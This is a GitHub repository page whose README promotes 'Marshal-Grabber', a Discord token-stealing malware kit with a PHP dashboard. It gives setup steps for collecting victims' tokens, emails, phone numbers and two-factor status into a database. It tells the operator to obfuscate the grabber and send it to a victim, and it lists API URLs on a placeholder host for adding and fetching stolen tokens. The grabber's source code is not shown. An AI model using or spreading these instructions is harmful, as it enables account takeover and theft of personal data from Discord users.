Skip to content

cepheidev/Marshal-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

41 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Marshal-s-Grabber

The Best Most powerfull token grabber with dashboard.

🚀 Marshal`s Lab 🚀

The most powerfull Discord Token Grabber with Dasboard

Join my Discord Server




Features

  • All in Interface
  • Can't delete webhook
  • Custom API for fetch/remove/add tokens
  • Login system with secret password
  • Grabber on 22 Applications/browsers
  • Very Simple Usage



Usage

For use Marshal, you need a Server accept PHP and contain a database,

  1. Put the files in your host
  2. Go to your phpmyadmin, in section SQL paste that:
CREATE TABLE `tokens` (
  `user_id` text NOT NULL,
  `username` text NOT NULL,
  `avatar` text NOT NULL,
  `email` text NOT NULL,
  `phone` text NOT NULL,
  `badges` text NOT NULL,
  `nitro_badges` text NOT NULL,
  `twofactor` text NOT NULL,
  `token` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
  1. Make your database ip,databse name,username,password in the file Inc/database.php
  2. Setup your passwords and webhooks in INC/functions.php
  3. Make your host adress in Grabber/python/marshal.py at line 5
  4. Compile and obfuscated your Grabber and send it to your victime :)
  1. Put a stars and follow me for more :)



API Working

  • Add Discord Token To Database
    • https://yourhost.com/api?type=addtoken&token=THE_VICTIME_TOKEN
  • Remove Discord Token From Database
    • https://yourhost.com/api?type=removetoken&password=YOUR_SECRET_PASSWORD&token=THE_VICTIME_TOKEN
  • Fetch Discord Token Info From Database
    • https://yourhost.com/api?type=fetchtoken&password=YOUR_SECRET_PASSWORD&token=THE_VICTIME_TOKEN



Demos

  • Login Page

  • Index Page

  • Tokens Page

  • Youtube Demo soon



Credits.

Contribution Welcome License Badge Open Source Visitor Count

About

The Best Most powerfull token grabber with dashboard.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published